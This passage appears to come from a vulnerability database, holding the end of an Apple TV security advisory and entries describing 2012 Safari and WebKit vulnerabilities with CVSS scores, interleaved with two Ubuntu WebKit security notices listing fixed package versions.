protocol. This issue was addressed by disabling DNAv4 on unencrypted
Wi-Fi networks
CVE-ID
CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF file may lead to an
unexpected application termination or arbitrary code execution
Description: A buffer overflow existed in libtiff's handling of
ThunderScan encoded TIFF images. This issue was addressed by updating
libtiff to version 3.9.5.
CVE-ID
CVE-2011-1167
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted PNG image may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in libpng's
handling of PNG images. These issues were addressed through improved
validation of PNG images.
CVE-ID
CVE-2011-3026 : Juri Aedla
CVE-2011-3048
CVE-2011-3328
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted JPEG image may lead to an
unexpected application termination or arbitrary code execution
Description: A double free issue existed in ImageIO's handling of
JPEG images. This issue was addressed through improved memory
management.
CVE-ID
CVE-2012-3726 : Phil of PKJE Consulting
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Viewing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: An integer overflow issue existed in libTIFF's handling
of TIFF images. This issue was addressed through improved validation
of TIFF images. This issue does not affect OS X Mountain Lion
systems.
CVE-ID
CVE-2012-1173
Apple TV
Available for: Apple TV 2nd generation and later
Impact: Applications that use ICU may be vulnerable to an unexpected
application termination or arbitrary code execution
Description: A stack buffer overflow existed in the handling of ICU
locale IDs. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2011-4599
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple vulnerabilities existed in libxml, the most
serious of which may lead to an unexpected application termination or
arbitrary code execution. These issues were addressed by applying the
relevant upstream patches.
CVE-ID
CVE-2011-1944 : Chris Evans of Google Chrome Security Team
CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of
Chinese Academy of Sciences
CVE-2011-3919 : Juri Aedla
Apple TV
Available for: Apple TV 2nd generation and later
Impact: An attacker with a privileged network position may cause an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in
JavaScriptCore. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2012-0682 : Apple Product Security
CVE-2012-0683 : Dave Mandelin of Mozilla
CVE-2012-3589 : Dave Mandelin of Mozilla
CVE-2012-3590 : Apple Product Security
CVE-2012-3591 : Apple Product Security
CVE-2012-3592 : Apple Product Security
CVE-2012-3678 : Apple Product Security
CVE-2012-3679 : Chris Leary of Mozilla
Installation note:
Apple TV will periodically check for software updates. Alternatively,
you may manually check for software updates by selecting
"Settings -> General -> Update Software".
To check the current version of software, select
"Settings -> General -> About".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJQXO50AAoJEPefwLHPlZEwc40P/AmBKys+PAsdT8gGrSpOY1B9
8h+Y0xdE+Hmesq9D4p6wvdY/lR+zMqtSwT6amNImYCIaRmm1P8+r8n31be52TYlg
7GqEAZbDtFztHwIISC8Khf8dMvWSrLhzRa7X/cxlIgRKmoXFnqJZzYcUov/M9Uw8
KwejQnztmAx7srHnZCNI+dxFqAC7hPoegnDnlVPx1DkwKDjt8q9xD3PGQyiGWWkI
wqUEWvMGWr65CFyA7R0hDqKuNCowWn2cKP1UhIoEur5yRmc4aQVtOnHhJ8k9mdoO
+58JC/y8lCtqGUyEL2Ar0FmIcRX/GJf+/isKOtmHx0JuEhH5beQ6s9FxU5eNR9DH
EVPmVXowY9wMvKxwHFU3jwq8kQ3+IYC+7KA6lScb5mXO5mC5dbJPLp7uJto7+VtI
atgQmvzdB8G562wpwTPuA4UQWWr0i6WWl8zkfgkRHO+cXyN683rkBP/vVEo9FipR
YkQ10RsXqYDRXBcRywmTZZwQy6txMtV9D2bnk1uukQHBsZh30/mEpcmZbo6CO3s3
mnOtu5D2OQsNt4MqbviUkEgdc9JIJnqAOo+9YguDCEu6Rd7unbKB3RpmD+A3OJnR
GhEa2Gqyvm/ozfb2D4L01y4UQo7dMLw+t/FOZXkrpdLlWn2LANWvXDCPSzIFCKoN
cXF+ij425pfY+d7Iekz3
=PSL+
-----END PGP SIGNATURE-----
| VAR-201207-0488 | CVE-2012-0680 | plural Apple Vulnerabilities that can bypass product authentication |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 does not properly handle the autocomplete attribute of a password input element, which allows remote attackers to bypass authentication by leveraging an unattended workstation. Apple Safari is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and gain access to potentially sensitive information.
Versions prior to Safari 6.0 are vulnerable.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201207-0487 | CVE-2012-0679 | Apple Safari 6.0 Vulnerability to read arbitrary files in less than |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple Safari before 6.0 allows remote attackers to read arbitrary files via a feed:// URL. Apple Safari is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201207-0486 | CVE-2012-0678 | Apple Safari 6.0 Cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 allows remote attackers to inject arbitrary web script or HTML via a feed:// URL.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Apple Safari versions prior to 6.0.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems
| VAR-201207-0328 | CVE-2012-1520 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0
| VAR-201207-0275 | CVE-2012-3655 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. ============================================================================
Ubuntu Security Notice USN-1524-1
August 08, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.1-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.1-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.1-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.1-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1524-1
CVE-2011-3046, CVE-2011-3050, CVE-2011-3067, CVE-2011-3068,
CVE-2011-3069, CVE-2011-3071, CVE-2011-3073, CVE-2011-3074,
CVE-2011-3075, CVE-2011-3078, CVE-2012-0672, CVE-2012-3615,
CVE-2012-3655, CVE-2012-3656, CVE-2012-3680, https://launchpad.net/bugs/1027283
Package Information:
https://launchpad.net/ubuntu/+source/webkit/1.8.1-0ubuntu0.12.04.1
| VAR-201207-0274 | CVE-2012-3646 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0
| VAR-201207-0273 | CVE-2012-3645 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0. ============================================================================
Ubuntu Security Notice USN-1617-1
October 25, 2012
webkit vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Multiple security vulnerabilities were fixed in WebKit.
Software Description:
- webkit: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKit browser and
JavaScript engines.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libjavascriptcoregtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libjavascriptcoregtk-3.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-1.0-0 1.8.3-0ubuntu0.12.04.1
libwebkitgtk-3.0-0 1.8.3-0ubuntu0.12.04.1
After a standard system update you need to restart your session to make all
the necessary changes.
References:
http://www.ubuntu.com/usn/usn-1617-1
CVE-2011-3031, CVE-2011-3038, CVE-2011-3042, CVE-2011-3043,
CVE-2011-3044, CVE-2011-3051, CVE-2011-3053, CVE-2011-3059,
CVE-2011-3060, CVE-2011-3064, CVE-2011-3067, CVE-2011-3076,
CVE-2011-3081, CVE-2011-3086, CVE-2011-3090, CVE-2012-1521,
CVE-2012-3598, CVE-2012-3601, CVE-2012-3604, CVE-2012-3611,
CVE-2012-3612, CVE-2012-3617, CVE-2012-3625, CVE-2012-3626,
CVE-2012-3627, CVE-2012-3628, CVE-2012-3645, CVE-2012-3652,
CVE-2012-3657, CVE-2012-3669, CVE-2012-3670, CVE-2012-3671,
CVE-2012-3672, CVE-2012-3674, CVE-2012-3674, https://launchpad.net/bugs/1058339
Package Information:
https://launchpad.net/ubuntu/+source/webkit/1.8.3-0ubuntu0.12.04.1
| VAR-201207-0272 | CVE-2012-3644 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0
| VAR-201207-0271 | CVE-2012-3641 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0
| VAR-201207-0270 | CVE-2012-3640 | plural Apple Used in products WebKit Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
WebKit, as used in Apple Safari before 6.0, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2012-07-25-1. WebKit is prone to multiple unspecified remote code-execution vulnerabilities.
Attackers can exploit these issues by performing a man-in-the-middle attack. Successful attacks will result in arbitrary code execution; failed attacks may cause denial-of-service conditions.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems. Vulnerabilities exist in using WebKit in versions prior to Apple Safari 6.0
| VAR-201207-0268 | CVE-2012-3650 | plural Apple Used in products WebKit Vulnerability in which important information is obtained |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
WebKit in Apple Safari before 6.0 accesses uninitialized memory locations during the rendering of SVG images, which allows remote attackers to obtain sensitive information from process memory via a crafted web site. WebKit is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Note: This issue was previously discussed in BID 54669 (Apple Safari Prior to 6.0 Multiple Security Vulnerabilities), but has been given its own record to better document it. Apple Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with Mac OS X and iOS operating systems